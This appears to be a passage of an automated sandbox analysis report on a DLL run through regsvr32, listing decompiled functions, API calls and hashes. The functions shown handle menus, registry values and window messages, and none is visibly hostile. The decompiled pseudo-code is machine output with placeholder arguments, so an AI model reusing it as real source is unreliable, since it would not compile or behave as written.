                                                                              0x10019e63
                                                                              0x10019e79
                                                                              0x10019e7d
                                                                              0x10019e85
                                                                              0x10019e88
                                                                              0x10019e8a
                                                                              0x10019e8a
                                                                              0x10019e9b

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsObjectSelect$EmptyMessageRectSendSystemText
                                                                              • String ID:
                                                                              • API String ID: 3146435517-0
                                                                              • Opcode ID: 76c831953c8f78dc9faab0da0579abfb7ab7343abcc8d2477144bde0c0e922c1
                                                                              • Instruction ID: e2299d133d218535f378c0bc20fa72efac64cae7fd7f21b5408de503183452e4
                                                                              • Opcode Fuzzy Hash: 76c831953c8f78dc9faab0da0579abfb7ab7343abcc8d2477144bde0c0e922c1
                                                                              • Instruction Fuzzy Hash: 81216D36305A4187DB10CF25E884B9EB7A0FB89B88F454025EB8A47B58DF78D885CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10032274 Relevance: 9.1, APIs: 6, Instructions: 68registrystringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegDeleteKeyW.ADVAPI32 ref: 100322B6
                                                                              • RegDeleteValueW.ADVAPI32 ref: 100322D9
                                                                              • RegCloseKey.ADVAPI32 ref: 1003231E
                                                                                • Part of subcall function 10031F88: RegOpenKeyExW.ADVAPI32 ref: 10031FCB
                                                                                • Part of subcall function 10031F88: RegCreateKeyExW.ADVAPI32 ref: 1003201E
                                                                                • Part of subcall function 10031F88: RegCreateKeyExW.ADVAPI32 ref: 1003206A
                                                                                • Part of subcall function 10031F88: RegCloseKey.ADVAPI32 ref: 1003207D
                                                                                • Part of subcall function 10031F88: RegCloseKey.ADVAPI32 ref: 10032090
                                                                              • lstrlenW.KERNEL32 ref: 100322F1
                                                                              • RegSetValueExW.ADVAPI32 ref: 10032313
                                                                              • WritePrivateProfileStringW.KERNEL32 ref: 1003233D
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Close$CreateDeleteValue$OpenPrivateProfileStringWritelstrlen
                                                                              • String ID:
                                                                              • API String ID: 2968912475-0
                                                                              • Opcode ID: a5f626c994affaa2704b2b5b9217a0239ff213eaf74e39287ef7192fec2b8f69
                                                                              • Instruction ID: 231f16fd663664a9fd938347149f9000a926d383fc3262e01475c8a23fd42ced
                                                                              • Opcode Fuzzy Hash: a5f626c994affaa2704b2b5b9217a0239ff213eaf74e39287ef7192fec2b8f69
                                                                              • Instruction Fuzzy Hash: 9A11E7367023508DDE26EF93AD08BEE6290EB49FC6F9A0431DE494BB50DE7C9589C601
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100339D4 Relevance: 9.1, APIs: 6, Instructions: 64windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 64%
                                                                              			E100339D4(void* __ebx, signed int __edx, void* __rcx, void* __r8, void* __r9, void* __r11) {
				struct HACCEL__* _t26;
				struct HACCEL__* _t29;
				void* _t34;
				intOrPtr _t35;
				signed int _t36;
				intOrPtr _t41;
				long long _t50;
				void* _t63;
				void* _t65;

				_t66 = __r11;
				_t65 = __r9;
				_t64 = __r8;
				_t36 = __edx;
				_t34 = __ebx;
				_t50 =  *((intOrPtr*)(__rcx + 0xb8));
				_t63 = __rcx;
				if( *((intOrPtr*)(_t50 - 0x10)) == 0) {
					_t41 =  *((intOrPtr*)(__rcx + 0x80));
					_t35 = _t41;
					_t26 = E10028FE0(_t50);
					if(_t50 != 0) {
						_t4 = _t63 + 0xb8; // 0xb8
						r8d = _t41;
						_t26 = E10009BA4(_t50, _t4, _t50, __r8, __r11);
					}
				}
				if( *(_t63 + 0x88) != 0 &&  *((long long*)(_t63 + 0x60)) == 0) {
					E1000A57C(_t34, _t35, _t36, _t41, _t50, _t64, _t65, _t66);
					LoadMenuW(??, ??);
					_t36 =  *(_t63 + 0x88) & 0x0000ffff;
					 *((long long*)(_t63 + 0x60)) = _t50;
					_t26 = LoadAcceleratorsW(??, ??);
					 *((long long*)(_t63 + 0x68)) = _t50;
				}
				if( *(_t63 + 0x84) != 0 &&  *((long long*)(_t63 + 0x70)) == 0) {
					E1000A57C(_t34, _t35, _t36, _t41, _t50, _t64, _t65, _t66);
					LoadMenuW(??, ??);
					_t36 =  *(_t63 + 0x84) & 0x0000ffff;
					 *((long long*)(_t63 + 0x70)) = _t50;
					_t26 = LoadAcceleratorsW(??, ??);
					 *((long long*)(_t63 + 0x78)) = _t50;
				}
				if( *((intOrPtr*)(_t63 + 0x8c)) == 0 ||  *((long long*)(_t63 + 0x50)) != 0) {
					return _t26;
				} else {
					E1000A57C(_t34, _t35, _t36, _t41, _t50, _t64, _t65, _t66);
					LoadMenuW(??, ??);
					 *((long long*)(_t63 + 0x50)) = _t50;
					_t29 = LoadAcceleratorsW(??, ??);
					 *((long long*)(_t63 + 0x58)) = _t50;
					return _t29;
				}
			}












                                                                              0x100339d4
                                                                              0x100339d4
                                                                              0x100339d4
                                                                              0x100339d4
                                                                              0x100339d4
                                                                              0x100339dc
                                                                              0x100339e3
                                                                              0x100339ea
                                                                              0x100339ec
                                                                              0x100339f2
                                                                              0x100339f4
                                                                              0x100339fc
                                                                              0x100339fe
                                                                              0x10033a05
                                                                              0x10033a0b
                                                                              0x10033a0b
                                                                              0x100339fc
                                                                              0x10033a17
                                                                              0x10033a20
                                                                              0x10033a33
                                                                              0x10033a39
                                                                              0x10033a43
                                                                              0x10033a47
                                                                              0x10033a4d
                                                                              0x10033a4d
                                                                              0x10033a58
                                                                              0x10033a61
                                                                              0x10033a74
                                                                              0x10033a7a
                                                                              0x10033a84
                                                                              0x10033a88
                                                                              0x10033a8e
                                                                              0x10033a8e
                                                                              0x10033a99
                                                                              0x10033ada
                                                                              0x10033aa2
                                                                              0x10033aa2
                                                                              0x10033ab5
                                                                              0x10033ac5
                                                                              0x10033ac9
                                                                              0x10033acf
                                                                              0x00000000
                                                                              0x10033acf

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Load$AcceleratorsMenu$FindResource
                                                                              • String ID:
                                                                              • API String ID: 2783954065-0
                                                                              • Opcode ID: 2bd66f1cdb941bc76e389db81a518e4d15546976aebcba4d2c3dde5d689666f9
                                                                              • Instruction ID: 323410fd9a50f3e6dbaf69743de9daa245f4bd05e734a287f9afe7bac8c7b5f9
                                                                              • Opcode Fuzzy Hash: 2bd66f1cdb941bc76e389db81a518e4d15546976aebcba4d2c3dde5d689666f9
                                                                              • Instruction Fuzzy Hash: 49214C36700B5596EB49DB22EA483AC73E0F749B96F0580258F8A47750EF78E4F8C711
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10033CC4 Relevance: 9.1, APIs: 6, Instructions: 56registrystringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Valuelstrlen$CloseCreate
                                                                              • String ID:
                                                                              • API String ID: 306239685-0
                                                                              • Opcode ID: 1c8eff81dd4ed517c378105be2b7f8ed1c9c42f9d51607cbae027f5223807097
                                                                              • Instruction ID: 6c6699446dc298b04ab11ca3c7d8ba91250bb9f40df9fecb90b7419c3a730f71
                                                                              • Opcode Fuzzy Hash: 1c8eff81dd4ed517c378105be2b7f8ed1c9c42f9d51607cbae027f5223807097
                                                                              • Instruction Fuzzy Hash: 8C11C1723006808ACB118F26BC847D96390E788BD9FA64231EF55877E4CE38C488CA00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10029D40 Relevance: 9.0, APIs: 6, Instructions: 47windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 23%
                                                                              			E10029D40(void* __rax, void* __rcx) {
				struct HWND__* _t1;
				void* _t15;
				void* _t18;
				void* _t19;
				void* _t29;

				_t18 = __rax;
				_t19 = __rcx;
				_t1 = GetFocus();
				if(__rax != 0 && __rax != __rcx) {
					if(E10029BAC(3, __rax, _t29) != 0) {
						L5:
						_t15 = _t19;
						if(_t15 == 0) {
							L8:
							r9d = 0;
							r8d = 0;
							return SendMessageW(??, ??, ??, ??);
						}
						GetWindowLongW();
						asm("bt eax, 0x1e");
						if(_t15 >= 0) {
							goto L8;
						}
						GetParent();
						_t1 = GetDesktopWindow();
						if(_t18 != _t18) {
							goto L8;
						}
					} else {
						_t1 = GetParent();
						if(_t18 != __rcx) {
							_t1 = E10029BAC(2, _t18, _t29);
							if(_t1 != 0) {
								goto L5;
							}
						}
					}
				}
				return _t1;
			}








                                                                              0x10029d40
                                                                              0x10029d47
                                                                              0x10029d4a
                                                                              0x10029d56
                                                                              0x10029d6c
                                                                              0x10029d90
                                                                              0x10029d90
                                                                              0x10029d93
                                                                              0x10029dc0
                                                                              0x10029dc0
                                                                              0x10029dc3
                                                                              0x00000000
                                                                              0x10029dce
                                                                              0x10029d9d
                                                                              0x10029da3
                                                                              0x10029da7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10029dac
                                                                              0x10029db5
                                                                              0x10029dbe
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10029d6e
                                                                              0x10029d71
                                                                              0x10029d7d
                                                                              0x10029d87
                                                                              0x10029d8e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10029d8e
                                                                              0x10029d7d
                                                                              0x10029d6c
                                                                              0x10029dda

                                                                              APIs
                                                                              • GetFocus.USER32 ref: 10029D4A
                                                                              • GetParent.USER32 ref: 10029D71
                                                                                • Part of subcall function 10029BAC: GetWindowLongW.USER32 ref: 10029BD8
                                                                                • Part of subcall function 10029BAC: GetClassNameW.USER32 ref: 10029BF3
                                                                                • Part of subcall function 10029BAC: CompareStringW.KERNEL32 ref: 10029C1E
                                                                              • GetWindowLongW.USER32 ref: 10029D9D
                                                                              • GetParent.USER32 ref: 10029DAC
                                                                              • GetDesktopWindow.USER32 ref: 10029DB5
                                                                              • SendMessageW.USER32 ref: 10029DCE
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$LongParent$ClassCompareDesktopFocusMessageNameSendString
                                                                              • String ID:
                                                                              • API String ID: 1233893325-0
                                                                              • Opcode ID: 90e660389f11fd990492e069f623bb9a9ea142b47e9e30506725c715ec4d3a07
                                                                              • Instruction ID: f506c6677e75d1da1f883779a62ef79d1ea4bcab9ec8bc760073907826c275c0
                                                                              • Opcode Fuzzy Hash: 90e660389f11fd990492e069f623bb9a9ea142b47e9e30506725c715ec4d3a07
                                                                              • Instruction Fuzzy Hash: 50016D2170228102FE49DB22FE193A95391DF89BC5FCA08308D4A0B785EF6CD885D710
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100337E4 Relevance: 9.0, APIs: 6, Instructions: 41windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyMenu.USER32 ref: 100337F6
                                                                              • FreeResource.KERNEL32(?,?,?,100264C3), ref: 10033805
                                                                              • DestroyMenu.USER32 ref: 10033814
                                                                              • FreeResource.KERNEL32(?,?,?,100264C3), ref: 10033823
                                                                              • DestroyMenu.USER32 ref: 10033832
                                                                              • FreeResource.KERNEL32(?,?,?,100264C3), ref: 10033841
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: DestroyFreeMenuResource
                                                                              • String ID:
                                                                              • API String ID: 2790856715-0
                                                                              • Opcode ID: 0ad87ab8b3dce5ef9ac16dbd1db4e968ca475b15c92c2408b45e0b29e2be61a7
                                                                              • Instruction ID: 8872e0526c5673dad50b621a0624e74996f20205adc6fd85b04a6ed37d2539ee
                                                                              • Opcode Fuzzy Hash: 0ad87ab8b3dce5ef9ac16dbd1db4e968ca475b15c92c2408b45e0b29e2be61a7
                                                                              • Instruction Fuzzy Hash: D8014039302B008AEF4ADF76D8903683360FF88FA6F0686159D1A87750DF28C885C751
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10029CB8 Relevance: 9.0, APIs: 6, Instructions: 37COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rect$ClientCtrlLongScreen
                                                                              • String ID:
                                                                              • API String ID: 1315500227-0
                                                                              • Opcode ID: 7b86201412f77e9e29f505c18fbe9842a325a5e3b23b75616013b6845015af26
                                                                              • Instruction ID: 29771dd084be384452dcaa62784f4233f550e9da95a484c82ac079f95a4df30b
                                                                              • Opcode Fuzzy Hash: 7b86201412f77e9e29f505c18fbe9842a325a5e3b23b75616013b6845015af26
                                                                              • Instruction Fuzzy Hash: 57018C34355A8582EE50DF25BC043DA63A0FB8ABDAF964824CD8A06768EF7CC5858B04
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100274F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseEnumOpenQueryValue
                                                                              • String ID: Software\
                                                                              • API String ID: 3984146545-964853688
                                                                              • Opcode ID: 5ed920eb207b0a0e18ac51147e483a2643b8dc4c9892195cddd63e2734705c57
                                                                              • Instruction ID: 44718973242dc6f030b071427ce3d6df9f6c71c9006262d145ea4fb3a1ff54dc
                                                                              • Opcode Fuzzy Hash: 5ed920eb207b0a0e18ac51147e483a2643b8dc4c9892195cddd63e2734705c57
                                                                              • Instruction Fuzzy Hash: 76515F76315E8582DB40CB29F84478E63A1FB85BE4F955222EA6E877E8DF78C485C700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1000DC70 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 69%
                                                                              			E1000DC70() {
				long long _v88;
				long long _v96;
				intOrPtr _v100;
				char _v104;
				void* _t38;
				void* _t46;
				void* _t56;
				void* _t57;
				intOrPtr* _t73;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr* _t85;
				void* _t95;
				intOrPtr* _t97;
				void* _t103;
				void* _t105;
				void* _t107;

				_t74 = _t80;
				E1000DC24(0, _t57, _t73, _t80);
				E1000DC24(1, _t57, _t73, _t74);
				_t50 = 2;
				E1000DC24(2, _t57, _t73, _t74);
				_t83 = _t74;
				_pop(_t75);
				_t97 = _t83;
				E10023E40(_t73);
				_t76 = _t73;
				if(_t73 == 0) {
					L10:
					_t84 =  *((intOrPtr*)(_t97 + 0x90));
					if(_t84 != 0) {
						_t73 =  *_t84;
						 *((intOrPtr*)(_t73 + 0xa0))();
						 *((long long*)(_t97 + 0x90)) = 0;
					}
					_t85 =  *((intOrPtr*)(_t97 + 0x98));
					if(_t85 != 0) {
						_t73 =  *_t85;
						_t50 = 1;
						 *((intOrPtr*)(_t73 + 8))();
					}
					 *((long long*)(_t97 + 0x98)) = 0;
					if(( *(_t97 + 0x78) & 0x00000001) != 0) {
						_t38 = E1000A5CC(_t46, 0, _t50, _t56, _t73, _t85, _t95, _t103, _t105, _t107);
						_t79 =  *((intOrPtr*)(_t73 + 0x78));
						if(_t79 != 0 &&  *((long long*)(_t79 + 0x40)) != 0) {
							_t19 = _t95 + 0x48; // 0x48
							r8d = _t19;
							E1003A240(_t38, 0, 0,  &_v104, _t95, _t103);
							_t73 =  *((intOrPtr*)(_t97 + 0x40));
							r8d = 0;
							_v96 = _t73;
							_v88 = _t73;
							_v104 = 0x38;
							_v100 = 1;
							SendMessageW(??, ??, ??, ??);
						}
					}
					__imp__GetWindowLongPtrW();
					E100116FC();
					__imp__GetWindowLongPtrW();
					if(_t73 == _t73) {
						_t73 =  *_t97;
						 *((intOrPtr*)(_t73 + 0x1e0))();
						if( *_t73 != 0) {
							__imp__SetWindowLongPtrW();
						}
					}
					E100118C0(_t46, 0, _t56, _t73, _t97, _t95, _t107);
					goto ( *((intOrPtr*)( *_t97 + 0x228)));
				} else {
					if( *((intOrPtr*)(_t73 + 0x40)) != _t97) {
						L8:
						if( *((intOrPtr*)(_t76 + 0x48)) == _t97) {
							 *((long long*)(_t76 + 0x48)) = 0;
						}
						goto L10;
					}
					E1000A57C(_t46, 0, 2, _t56, _t73, _t103, _t105, _t107);
					if( *((char*)(_t73 + 0x28)) == 0) {
						E1000A57C(_t46, 0, 2, _t56, _t73, _t103, _t105, _t107);
						if(_t76 !=  *((intOrPtr*)(_t73 + 8)) || E1002BB04(0, _t73) != 0) {
							E10024D14();
						}
					}
					 *((long long*)(_t76 + 0x40)) = 0;
					goto L8;
				}
			}
























                                                                              0x1000dc78
                                                                              0x1000dc7b
                                                                              0x1000dc88
                                                                              0x1000dc8d
                                                                              0x1000dc95
                                                                              0x1000dc9a
                                                                              0x1000dca1
                                                                              0x100119d7
                                                                              0x100119da
                                                                              0x100119e2
                                                                              0x100119e5
                                                                              0x10011a29
                                                                              0x10011a29
                                                                              0x10011a33
                                                                              0x10011a35
                                                                              0x10011a38
                                                                              0x10011a3e
                                                                              0x10011a3e
                                                                              0x10011a49
                                                                              0x10011a53
                                                                              0x10011a55
                                                                              0x10011a58
                                                                              0x10011a5d
                                                                              0x10011a5d
                                                                              0x10011a64
                                                                              0x10011a6f
                                                                              0x10011a71
                                                                              0x10011a76
                                                                              0x10011a7d
                                                                              0x10011a8d
                                                                              0x10011a8d
                                                                              0x10011a91
                                                                              0x10011a96
                                                                              0x10011aa3
                                                                              0x10011aab
                                                                              0x10011ab0
                                                                              0x10011ab5
                                                                              0x10011abd
                                                                              0x10011ac5
                                                                              0x10011ac5
                                                                              0x10011a7d
                                                                              0x10011ad4
                                                                              0x10011ae0
                                                                              0x10011aee
                                                                              0x10011af7
                                                                              0x10011af9
                                                                              0x10011aff
                                                                              0x10011b0b
                                                                              0x10011b16
                                                                              0x10011b16
                                                                              0x10011b0b
                                                                              0x10011b1f
                                                                              0x10011b30
                                                                              0x100119e7
                                                                              0x100119eb
                                                                              0x10011a1b
                                                                              0x10011a1f
                                                                              0x10011a21
                                                                              0x10011a21
                                                                              0x00000000
                                                                              0x10011a1f
                                                                              0x100119ed
                                                                              0x100119f6
                                                                              0x100119f8
                                                                              0x10011a01
                                                                              0x10011a0e
                                                                              0x10011a0e
                                                                              0x10011a01
                                                                              0x10011a13
                                                                              0x00000000
                                                                              0x10011a13

                                                                              APIs
                                                                                • Part of subcall function 1000DC24: SendMessageW.USER32 ref: 1000DC40
                                                                                • Part of subcall function 1000DC24: SendMessageW.USER32 ref: 1000DC62
                                                                              • SendMessageW.USER32 ref: 10011AC5
                                                                              • GetWindowLongPtrW.USER32 ref: 10011AD4
                                                                              • GetWindowLongPtrW.USER32 ref: 10011AEE
                                                                              • SetWindowLongPtrW.USER32 ref: 10011B16
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: LongMessageSendWindow
                                                                              • String ID: 8
                                                                              • API String ID: 3360111000-4194326291
                                                                              • Opcode ID: 571ebe0307505592431505ad3392ccd149928207c9e523825eb5f4a1114dfa1d
                                                                              • Instruction ID: e591bd90487491b5feecee9d64de4be87ecd0e0140b373a6745f46aebc04c872
                                                                              • Opcode Fuzzy Hash: 571ebe0307505592431505ad3392ccd149928207c9e523825eb5f4a1114dfa1d
                                                                              • Instruction Fuzzy Hash: 4541A936302A8082EB19DB72E5503AD37A0FB88FD8F594121DE490B795DF7AD8D5C301
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100279B4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 33%
                                                                              			E100279B4(void* __ecx, void* __eflags, void* __rax, void* __rcx, void* __rdx, void* __r8, void* __r9) {
				void* _t26;
				void* _t27;
				void* _t39;
				void* _t41;

				_t41 = __r9;
				_t26 = __rax;
				_t27 = __rdx;
				_t39 = __rcx;
				if(E1000EBE0(__rax, __rcx, __rdx, __r8) == 0) {
					E10012674(_t39);
					if(_t26 == 0 ||  *((intOrPtr*)(_t26 + 0xc4)) == 0) {
						if( *((intOrPtr*)(_t27 + 8)) != 0x100 ||  *((long long*)(_t27 + 0x10)) != 0x1b &&  *((long long*)(_t27 + 0x10)) != 3 || (GetWindowLongW() & 0x00000004) == 0 || E10029C44(L"Edit", _t41) == 0) {
							L13:
							return E1000F330(_t27);
						} else {
							GetDlgItem();
							if(_t26 == 0 || IsWindowEnabled() != 0) {
								r9d = 0;
								_t9 = _t41 + 2; // 0x2
								r8d = _t9;
								SendMessageW(??, ??, ??, ??);
								goto L1;
							} else {
								goto L13;
							}
						}
					} else {
						return 0;
					}
				}
				L1:
				return 1;
			}







                                                                              0x100279b4
                                                                              0x100279b4
                                                                              0x100279bb
                                                                              0x100279be
                                                                              0x100279c8
                                                                              0x100279d7
                                                                              0x100279df
                                                                              0x100279f8
                                                                              0x10027a69
                                                                              0x00000000
                                                                              0x10027a2d
                                                                              0x10027a36
                                                                              0x10027a3f
                                                                              0x10027a52
                                                                              0x10027a5a
                                                                              0x10027a5a
                                                                              0x10027a5e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10027a3f
                                                                              0x100279ea
                                                                              0x00000000
                                                                              0x100279ea
                                                                              0x100279df
                                                                              0x100279ca
                                                                              0x00000000

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
